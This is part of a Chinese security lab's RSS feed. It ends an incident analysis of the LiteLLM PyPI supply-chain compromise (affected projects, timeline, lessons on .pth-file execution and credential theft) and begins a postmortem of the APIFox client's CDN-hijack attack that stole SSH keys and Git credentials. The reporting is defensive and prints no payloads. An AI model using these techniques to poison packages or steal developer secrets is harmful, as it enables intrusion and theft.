border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3.5M</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Mem0</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2.7M</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DSPy</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1.6M</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Agno</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1.6M</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Guardrails</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">233K</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Camel-AI</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">84K</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr></tbody></table></p></div><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3.2 时间窗口</span></strong></p></div></div></div></div><div style="font-size: 16px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">v1.82.7：</span></strong><span leaf="">10:39 UTC 发布</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">v1.82.8：</span></strong><span leaf="">约 14:00 UTC 发布</span></p></li></ul><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">下架时间：</span></strong><span leaf="">约 16:00 UTC（全程约 5 小时）</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击被发现的契机是 Callum McMahon 在使用 Cursor 的 MCP 插件时，litellm 作为传递依赖被安装，导致机器内存耗尽崩溃。如果载荷没有 bug，可能持续数天甚至数周不被发现。</span></p></div><div style="font-size: 16px;display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="letter-spacing: 0.034em;"><span leaf="">04 安全启示</span></strong></p></div></div></div></div><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">供应链攻击已成常态</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">TeamPCP 在 5 天内连续攻击 Trivy、npm 生态、Checkmarx、LiteLLM，展示了凭据窃取 → 横向移动 → 生态扩散的成熟攻击模式。一次入侵可以像多米诺骨牌一样影响整个生态。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">.pth 文件攻击面被低估</span></strong></p></div></div></div></div><p style="font-size: 16px;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM 1.82.8 的 .pth 文件攻击方式比传统的导入触发更隐蔽，用户可能根本不知道自己运行了被投毒的代码。这是 Python 生态安全审计的盲区。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">快速响应并不总是足够</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">虽然 LiteLLM 官方在约 5 小时内下架了恶意包，但对于已经安装的系统，损害已经造成。防御重点应该从&#34;快速响应&#34;转向&#34;预防性控制&#34;——固定版本、内部镜像、沙箱隔离。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">AI 生态是高价值目标</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM 作为 AI 应用栈的网关层，默认持有多个 LLM 厂商的 API key，还可能接触向量数据库、观测系统、工具集成等敏感资源。一次供应链攻击可以窃取价值显著的 AI 基础设施访问权限。</span></p><div style="font-size: 16px;display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">05 参考链接</span></span></strong></p></div></div></div></div><div style="font-size: 16px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[1]Datadog Security Labs: LiteLLM compromised on PyPI: Tracing the March 2026 TeamPCP supply chain campaign</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[2]LiteLLM 官方安全公告: Security Update: Suspected Supply Chain Incident</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[3]Upwind: LiteLLM Supply Chain Breakdown</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[4]Comet: LiteLLM Supply Chain Attack: What Happened, Who&#39;s Affected</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[5]ReversingLabs: TeamPCP software supply chain attack spreads to LiteLLM</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[6]悬镜安全: 紧急AI投毒情报 | 热门AI模型网关LiteLLM遭受供应链投毒</span></p></div><div style="font-size: 16px;margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=0a2e3348&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jClehwM8LfHxVhnGQd375slwyt0IwEI4K4TZlYC8SK9uq1NyypFRENhLUpsc4ku3C49nY5dBm0NAuylWOPNtHvaib0o5vd6tYibtI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.9722222222222222" data-s="300,640" data-type="png" data-w="1080" style="width: 100%;opacity: 0;box-sizing: border-box;height: auto !important;" data-imgfileid="100011148" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=12b36798&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmMlHZv6jndfQRia2J85gniamSpcylf6RnC0QLr1LTvqgQs29XfrgGzat0J4I7tEckP6qkV8OtBqCBCbUr27ibklPB5OBUbf0CCKk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="font-size: 16px;display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011147" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=79942195&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCkibqe6ktwbUfia6WmQ2wrIqQJKTWOctGzYmuUVibyibibJy10NBqac7kZWvEpKjhXbYaMcKMMBrLsrv3LUXvs0yJlKJ3v0wQI32q5I%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="font-size: 16px;display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.9145907473309609" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011146" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=b99e353e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCniceaLYORKFuYP3bWIw2AHVFVPzrOrkOGeMWJ2siaczL3nghB1LXLFKNLPhUQicdBfbjrIwBqYF7icdsGxgcUsNiavHO9W205fwe5k%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4800dde8&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494863%26idx%3D1%26sn%3D7dfc3a5beaa6eb8e38a24f1450827fbd">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 26 Mar 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>APIFox 供应链投毒事件复盘：从 Electron 安全配置缺陷到 CDN 劫持</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494863&amp;idx=2&amp;sn=dbaabd7f93aaa9c961bbf753976cc17d</link>
      <description>2026年3月25日，APIFox 团队发布安全公告，承认其公网 SaaS 版桌面客户端遭遇供应链攻击。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-26 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=9c5de7d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCl1CmYPIdS4aRL8VicKVYFUX7nEmJ5VlhAGEFsFBlbDZvMBnBRVibLuiaFwJAoLOEtbLYBOu5MPoe30lnQQ6OpTWUsRibsjIDZFiboE%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年3月25日，APIFox 团队发布安全公告，承认其公网 SaaS 版桌面客户端遭遇供应链攻击。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 7px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: 20px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;background-color: rgb(67, 146, 117);box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011158" src="https://wechat2rss.xlab.app/img-proxy/?k=86b99f21&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FuZT6kWW1jCnEchjjyDjZR67W46KcFfiadRQxl7w377crh7uCf8qDib6IgFiaRkibiadU6Nq3q0mr104WFZxAE3pTq9JAEwkLibv7SGic7rABAHOQWw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="font-size: 20px;line-height: 1;letter-spacing: 1px;padding: 0px 8px;text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">概述</span></b></p></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 3px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;border-bottom: 3px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;padding: 0px 10px 10px 20px;box-sizing: border-box;"><div style="color: rgb(106, 106, 106);line-height: 1.8;letter-spacing: 1px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年3月25日，APIFox 团队发布安全公告，承认其公网 SaaS 版桌面客户端遭遇供应链攻击。恶意代码通过 CDN 注入的方式，窃取用户 SSH 密钥、Git 凭证、命令行历史等敏感信息。攻击窗口期长达 18 天，受影响用户涵盖 Windows、macOS、Linux 全平台。</span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 事件背景</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APIFox 是一款 API 测试和管理工具，用户群体主要是开发者和测试工程师。2026年3月25日，安全社区发布预警，指出 APIFox 公网 SaaS 版桌面客户端遭遇供应链攻击。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者通过劫持 CDN 上的 JavaScript 文件，向用户推送恶意代码。由于 APIFox 基于 Electron 框架开发，且存在在线动态加载代码、sandbox 未启用、Node.js API 暴露等安全配置缺陷，恶意代码可直接读取用户本地文件系统。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">此次攻击的受影响范围为 APIFox 公网 SaaS 版桌面客户端 2.8.19 之前版本，攻击窗口期为 2026年3月4日至2026年3月22日，共计 18 天。</span></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div 